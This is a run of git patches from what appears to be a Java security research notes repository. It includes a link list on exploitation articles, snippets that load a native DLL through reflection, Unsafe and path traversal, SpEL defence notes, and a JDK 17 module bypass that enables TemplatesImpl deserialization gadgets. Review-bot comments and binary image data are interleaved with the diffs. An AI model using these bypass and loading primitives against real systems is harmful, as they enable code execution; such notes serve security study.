<63966847+Firebasky@users.noreply.github.com> Date: Wed, 14 Dec 2022 00:24:38 +0800 Subject: [PATCH 213/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1c3bad2..2e0bfa2 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -214,3 +214,4 @@ + 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds** + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) ++ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) From a018982d8b362af7684f13d3f5cfe37b94f1adce Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:20:20 +0800 Subject: [PATCH 214/332] Add files via upload --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 +++++++++++++++++++ ...46\344\271\240\351\230\262\345\276\241.md" | 16 ++++ 2 files changed, 91 insertions(+) create mode 100644 "java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" create mode 100644 "spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" new file mode 100644 index 0000000..d797145 --- /dev/null +++ "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" 
@@ -0,0 +1,75 @@ +# java 加载链接库的方法 + +https://tttang.com/archive/1436/ + +1.System.load + +```java +try { + System.load("D:\\temp\\calc_x64.dll"); +}catch (UnsatisfiedLinkError e){ + e.printStackTrace(); +} +``` + +2.Runtime.getRuntime().load + +```java +Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); +``` + +3.com.sun.glass.utils.NativeLibLoader.loadLibrary + +```java +com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); +``` + +有限制 + +1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 +2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 + +4.反射模拟底层调用 + +- 如果模拟ClassLoader加载就会存在两个方案 + - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 +- 如果模拟NativeLibrary就只存在load方法 + +**ClassLoader#loadLibrary** + +```java +try { + Class clazz = Class.forName("java.lang.ClassLoader"); + Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); + method.setAccessible(true); + method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); +}catch (Exception e){ + e.printStackTrace(); +} +``` + +**NativeLibrary#load** + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); +Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); +con.setAccessible(true); +Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class aClass = Class.forName("sun.misc.Unsafe"); +Constructor declaredConstructor = aClass.getDeclaredConstructor(); 
+declaredConstructor.setAccessible(true); +Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); +Object obj = unsafe.allocateInstance(a); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + diff --git "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" new file mode 100644 index 0000000..7eda739 --- /dev/null +++ "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" @@ -0,0 +1,16 @@ +# spel防御 + +最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 + +官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) + +![image-20220325230922109](img/image-20220325230922109.png) + +SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: + +- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 +- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 + +http://rui0.cn/archives/1043 \ No newline at end of file From c8eac49bc4b309dec18aef5f395c6417aa453493 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:11 +0800 Subject: [PATCH 215/332] =?UTF-8?q?Delete=20java=E5=8A=A0=E8=BD=BD?= =?UTF-8?q?=E9=93=BE=E6=8E=A5=E5=BA=93=E7=9A=84=E6=96=B9=E6=B3=95.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 ------------------- 1 file changed, 75 deletions(-) delete mode 100644 "java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" 
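Review bot: In PATCH 214/332, the last fenced block of the new `java加载链接库的方法.md` calls `unsafe.allocateInstance(a)`, but `a` is declared only in the previous block (`Class a = Class.forName("java.lang.ClassLoader$NativeLibrary")`), and the block has no label of its own, so it neither compiles nor reads on its own. Redeclare `a` inside that block and give it a heading that says it is the `sun.misc.Unsafe` variant of **NativeLibrary#load**. `JDKClassLoaderBypass.class` in the block before it is likewise never defined in the file. Since every snippet in section 4 reaches non-public members through `getDeclaredMethod` / `setAccessible(true)`, the file should state which JDK version these were tested on, as it already does for the JavaFX limitation. Typo in limitation 2: "比例说" should be "比如说".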
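Review bot: In PATCH 214/332, the documentation link in the new `spel学习防御.md` goes through a `links.jianshu.com/go?to=` redirector instead of pointing at the Spring javadoc directly; use the decoded target, `https://docs.spring.io/spring/docs/5.0.6.RELEASE/javadoc-api/org/springframework/expression/spel/support/SimpleEvaluationContext.html`, so the reference does not depend on a third-party redirect. The file also embeds `img/image-20220325230922109.png`, but the diffstat lists only the two markdown files, so check that the image exists at that relative path from the repository root. The file ends without a trailing newline.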
diff --git "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" deleted file mode 100644 index d797145..0000000 --- "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" +++ /dev/null 
@@ -1,75 +0,0 @@ -# java 加载链接库的方法 - -https://tttang.com/archive/1436/ - -1.System.load - -```java -try { - System.load("D:\\temp\\calc_x64.dll"); -}catch (UnsatisfiedLinkError e){ - e.printStackTrace(); -} -``` - -2.Runtime.getRuntime().load - -```java -Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); -``` - -3.com.sun.glass.utils.NativeLibLoader.loadLibrary - -```java -com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); -``` - -有限制 - -1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 -2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 - -4.反射模拟底层调用 - -- 如果模拟ClassLoader加载就会存在两个方案 - - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 -- 如果模拟NativeLibrary就只存在load方法 - -**ClassLoader#loadLibrary** - -```java -try { - Class clazz = Class.forName("java.lang.ClassLoader"); - Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); - method.setAccessible(true); - method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); -}catch (Exception e){ - e.printStackTrace(); -} -``` - -**NativeLibrary#load** - -```java -String file = "D:\\temp\\calc_x64.dll"; -Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); -Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); -con.setAccessible(true); -Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); -Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); -method.setAccessible(true); -method.invoke(obj, file, false); -``` - -```java -String file = "D:\\temp\\calc_x64.dll"; -Class aClass = Class.forName("sun.misc.Unsafe"); -Constructor declaredConstructor = aClass.getDeclaredConstructor(); 
-declaredConstructor.setAccessible(true); -Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); -Object obj = unsafe.allocateInstance(a); -Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); -method.setAccessible(true); -method.invoke(obj, file, false); -``` - From 26ae3d9a4125b1558d52b3565d7ee059f86ea92f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:28 +0800 Subject: [PATCH 216/332] =?UTF-8?q?Delete=20spel=E5=AD=A6=E4=B9=A0?= =?UTF-8?q?=E9=98=B2=E5=BE=A1.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...5\246\344\271\240\351\230\262\345\276\241.md" | 16 ---------------- 1 file changed, 16 deletions(-) delete mode 100644 "spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" deleted file mode 100644 index 7eda739..0000000 --- "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" +++ /dev/null @@ -1,16 +0,0 @@ -# spel防御 - -最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 - -官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) - -![image-20220325230922109](img/image-20220325230922109.png) - -SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: - -- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 -- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 - -SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 - -http://rui0.cn/archives/1043 \ No newline at end of file From 07b22ad376e71dcefc1f78afed88ee889f3439d2 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:21:51 +0800 Subject: [PATCH 217/332] Add files via upload --- ...23\347\232\204\346\226\271\346\263\225.md" | 75 +++++++++++++++++++ ...46\344\271\240\351\230\262\345\276\241.md" | 16 ++++ 2 files changed, 91 insertions(+) create mode 100644 "java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" create mode 100644 "java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" diff --git "a/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" new file mode 100644 index 0000000..d797145 --- /dev/null +++ "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" 
@@ -0,0 +1,75 @@ +# java 加载链接库的方法 + +https://tttang.com/archive/1436/ + +1.System.load + +```java +try { + System.load("D:\\temp\\calc_x64.dll"); +}catch (UnsatisfiedLinkError e){ + e.printStackTrace(); +} +``` + +2.Runtime.getRuntime().load + +```java +Runtime.getRuntime().load("D:\\temp\\calc_x64.dll"); +``` + +3.com.sun.glass.utils.NativeLibLoader.loadLibrary + +```java +com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64"); +``` + +有限制 + +1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。 +2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。 + +4.反射模拟底层调用 + +- 如果模拟ClassLoader加载就会存在两个方案 + - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。 +- 如果模拟NativeLibrary就只存在load方法 + +**ClassLoader#loadLibrary** + +```java +try { + Class clazz = Class.forName("java.lang.ClassLoader"); + Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class); + method.setAccessible(true); + method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true); +}catch (Exception e){ + e.printStackTrace(); +} +``` + +**NativeLibrary#load** + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class a = Class.forName("java.lang.ClassLoader$NativeLibrary"); +Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class}); +con.setAccessible(true); +Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + +```java +String file = "D:\\temp\\calc_x64.dll"; +Class aClass = Class.forName("sun.misc.Unsafe"); +Constructor declaredConstructor = aClass.getDeclaredConstructor(); 
+declaredConstructor.setAccessible(true); +Unsafe unsafe = (Unsafe)declaredConstructor.newInstance(); +Object obj = unsafe.allocateInstance(a); +Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class); +method.setAccessible(true); +method.invoke(obj, file, false); +``` + diff --git "a/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" new file mode 100644 index 0000000..7eda739 --- /dev/null +++ "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" @@ -0,0 +1,16 @@ +# spel防御 + +最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。 + +官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html) + +![image-20220325230922109](img/image-20220325230922109.png) + +SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext: + +- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。 +- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。 + +SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。 + +http://rui0.cn/archives/1043 \ No newline at end of file From d37127e0d84b1817af929b23a80b7025c0a01920 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 16:22:21 +0800 Subject: [PATCH 218/332] Add files via upload --- .../img/image-20220325230922109.png" | Bin 0 -> 14995 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 "java\346\227\245\345\270\270/img/image-20220325230922109.png" 
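Review bot: in the last snippet of java加载链接库的方法.md, `unsafe.allocateInstance(a)` uses `a`, which is declared only in the preceding `NativeLibrary#load` block, and `JDKClassLoaderBypass.class` in that block is never defined anywhere in the file, so neither block compiles when read on its own. Declare the class variable inside each snippet, and give the final block a heading as the other blocks have. The file does not say which JDK versions the reflective variants were checked against, and 比例说 in restriction 2 looks like a typo for 比如说.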
diff --git "a/java\346\227\245\345\270\270/img/image-20220325230922109.png" "b/java\346\227\245\345\270\270/img/image-20220325230922109.png" new file mode 100644 index 0000000000000000000000000000000000000000..c89682dbeb77ed09f40b9e1aba276300df1066bd GIT binary patch literal 14995
Date: Sat, 17 Dec 2022 17:57:05 +0800 Subject:
[PATCH 219/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2e0bfa2..bb3b049 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -215,3 +215,4 @@ + 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds* + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) ++ 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 From 2c8c93cab4d975230e7fb9c1d809e23496c629cf Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 17 Dec 2022 23:59:21 +0800 Subject: [PATCH 220/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bb3b049..4b3831d 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -216,3 +216,4 @@ + 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ) + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 ++ 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** 
From cf526c6b9e18f7f4b286ef8b676665667e455ac6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 18 Dec 2022 13:04:39 +0800 Subject: [PATCH 221/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4b3831d..f3aa154 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -217,3 +217,4 @@ + 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf) + 2022/12/17 [java.exe和javaw.exe区别](https://blog.csdn.net/xtho62/article/details/114085591) 在bp启动的时候看到了 + 2022/12/17 [Weakness in Java TLS Host Verification](https://blog.h3xstream.com/2020/10/weakness-in-java-tls-host-verification.html) **字符编码绕过** ++ 2022/12/18 [Java使用 try catch会影响性能?](https://mp.weixin.qq.com/s/kkEGvMwaG6J1WrD_DWRRzg) **不会** From 667d8c3134bfbfec9e8b43ed0adc5921b1a34ec1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 21 Dec 2022 16:12:46 +0800 Subject: [PATCH 222/332] =?UTF-8?q?Create=20jdk17=E7=BB=95=E8=BF=87Module.?= =?UTF-8?q?md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../jdk17\347\273\225\350\277\207Module.md" | 99 +++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 "java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" diff --git "a/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" new file mode 100644 index 0000000..dbd2d4e --- /dev/null +++ "b/java\346\227\245\345\270\270/jdk17\347\273\225\350\277\207Module.md" 
@@ -0,0 +1,99 @@ +# jdk17 bypass module + +https://www.bennyhuo.com/2021/10/02/Java17-Updates-06-internals/ + +https://github.com/BeichenDream/Kcon2021Code/blob/master/bypassJdk/JdkSecurityBypass.java + +在jdk17使用反序列化的时候发现要报错 + +``` +InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' cannot be accessed +``` + +![image-20221220230825845](img/image-20221220230825845.png) + +限制了 + +![image-20221220233047039](img/image-20221220233047039.png) + +限制了的类https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + +## 需要bypass + +``` +按照提案的说明,被严格限制的这些内部 API 包括: + +java.* 包下面的部分非 public 类、方法、属性,例如 Classloader 当中的 defineClass 等等。 +sun.* 下的所有类及其成员都是内部 API。 +绝大多数 com.sun.* 、 jdk.* 、org.* 包下面的类及其成员也是内部 API。 +``` + +**code** + +```java + +import sun.misc.Unsafe; +import java.lang.reflect.Field; +import java.lang.reflect.Method; +import java.util.ArrayList; + +/** + * https://cr.openjdk.java.net/~mr/jigsaw/jdk8-packages-strongly-encapsulated + */ +public class BypassModule { + public static void main(String[] args) throws Exception { + final ArrayList classes = new ArrayList<>(); + classes.add(Class.forName("java.lang.reflect.Field")); + classes.add(Class.forName("java.lang.reflect.Method")); + Class aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"); + classes.add(aClass); + new BypassModule().bypassModule(classes); + aClass.newInstance(); + } + + public void bypassModule(ArrayList classes){ + try { + Unsafe unsafe = getUnsafe(); + Class currentClass = this.getClass(); + try { + Method getModuleMethod = getMethod(Class.class, "getModule", new Class[0]); + if (getModuleMethod != null) { + for (Class aClass : classes) { + Object targetModule = getModuleMethod.invoke(aClass, new Object[]{}); + unsafe.getAndSetObject(currentClass, unsafe.objectFieldOffset(Class.class.getDeclaredField("module")), targetModule); + } + } + }catch (Exception e) { + } + }catch (Exception e){ 
+ e.printStackTrace(); + } + } + + private static Method getMethod(Class clazz,String methodName,Class[] params) { + Method method = null; + while (clazz!=null){ + try { + method = clazz.getDeclaredMethod(methodName,params); + break; + }catch (NoSuchMethodException e){ + clazz = clazz.getSuperclass(); + } + } + return method; + } + + private static Unsafe getUnsafe() { + Unsafe unsafe = null; + try { + Field field = Unsafe.class.getDeclaredField("theUnsafe"); + field.setAccessible(true); + unsafe = (Unsafe) field.get(null); + } catch (Exception e) { + throw new AssertionError(e); + } + return unsafe; + } +} +``` + From 23663113e7379fcb4a82734418991f114bcccb73 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 21 Dec 2022 16:13:21 +0800 Subject: [PATCH 223/332] Add files via upload --- .../img/image-20221220230825845.png" | Bin 0 -> 88141 bytes .../img/image-20221220233047039.png" | Bin 0 -> 130319 bytes 2 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 "java\346\227\245\345\270\270/img/image-20221220230825845.png" create mode 100644 "java\346\227\245\345\270\270/img/image-20221220233047039.png" 
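Review bot: the inner `catch (Exception e) { }` in `bypassModule` discards every failure from the `getModule` call and the `module` field lookup, so the method returns normally even when nothing was changed and the caller only sees a later access error from `aClass.newInstance()`; print or rethrow there as the outer catch does. `classes` is declared as a raw `ArrayList`, which `for (Class aClass : classes)` cannot iterate without a cast, so it needs a type parameter. The write-up also does not state which JDK 17 build it was run on, although it quotes an error message from one.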
diff --git "a/java\346\227\245\345\270\270/img/image-20221220230825845.png" "b/java\346\227\245\345\270\270/img/image-20221220230825845.png" new file mode 100644 index 0000000000000000000000000000000000000000..3d05b8e54a8c9df34ea91fd3311d710efb20620b GIT binary patch literal 88141
z(d`EX9`His)-*U&t!=|~#&k2^qS7bvrVEQ`@{XS)c@pd0xLbxeO=ZQ|SN-e_*H7-x zM;BazCS*BZz^zF7crNlnY(XLc_6l^VeMPxF_r@-GJd-OuM^RwcEBT@7zVLq%O&av@ z9>@02Z%*=Q#e-6!wFigk(4`QT7PpMZ{B9qUV~ndU4KvyN4a+8_t)qsvKh|X`j~bz^ zoxgr9*)jil%_xdrg@znL2Z%F;B{XJU6B{VN@XA!Azh1jyzt0mMWb+^#)6St6sZaog5T z+yCj1ad02BLfSLvzZL3^X-rk&qV~MGQ%AQsc#25)1jN@?$rh3unLw9+op%zOgW`wC z;;Ql>NfUKp?o%V1&aZe{_jU}Mz4cuF3lUM7L0OJx$SbTAZO;_KI2*qsq~jF^oA2_S^PBqC4bjNG>KXOkL(+t@WN z@%r*lNXHxdd6~sqESr~(4@|V;jXXxbIGbjPPW>a89RqAul*;`5;>W+e$!-oyYI<)% zR`}nrfzM(h^o9rk06c&r@>{mAf=)oBHS7PVpWH7M&{O9$AjNlaS%+#0a^Y|((T>eg z{CQ5cz%yV?v$Sz^v7yg)(19*ezxb=mY0E@Dpa;6M`FZM9{9yhM1kgmg9-APJf{nZl zxVqGXUv|Mqe%5-U+fKBrnS7tnb&2+6ilW!{_Xp6b$9*@VddJr4)4N|C5)+0ziN!f1 z3zcSD1UZdYhwT5Qcn1@B8r#@<3hY&itpDp@|1BJ8zERVhoCUepPWXfYvBOF)9OY>L zOFJYm5mKv0Q^)ohVmghB=Ksw5KV$obKK;4AisoVx3$StjYpgDlGoh;}nt|Vc3n~Be zJzK!UUdC0L9Est7Cja-EiE(IXsAbDGpVn_U!m*rFL8A2ipOrQ}3$KpOHp{-VM8n=sy~W;uJLVlnSOmZ%_{qk678FH|lSI?}T9cg4=2b4G`W3%khUyt97e zVFQTC=S1NT|Cy5&4>z}@tzMHQTWjNAP7QHzSgq*ap)rN?7rlsTJ^IReBItjsNU{aG z<-(RHWPHl7AN>U3V~RCj4iKCPK*y2FUK2Giil`y}H}A5hhYJFwemWM5Svl z!yomQWQjVDte_r`Sk$`ilV$;?x43m>6GPbwah)9%a*akv|2$X!>>9L(n4;S(pt>n^ zj;lnaVn0dY-Yy&hyR0HEW_QTKh#!TfL7nr8qSM^(z3uLUM6N#xV2iVK);=*!{x|8w 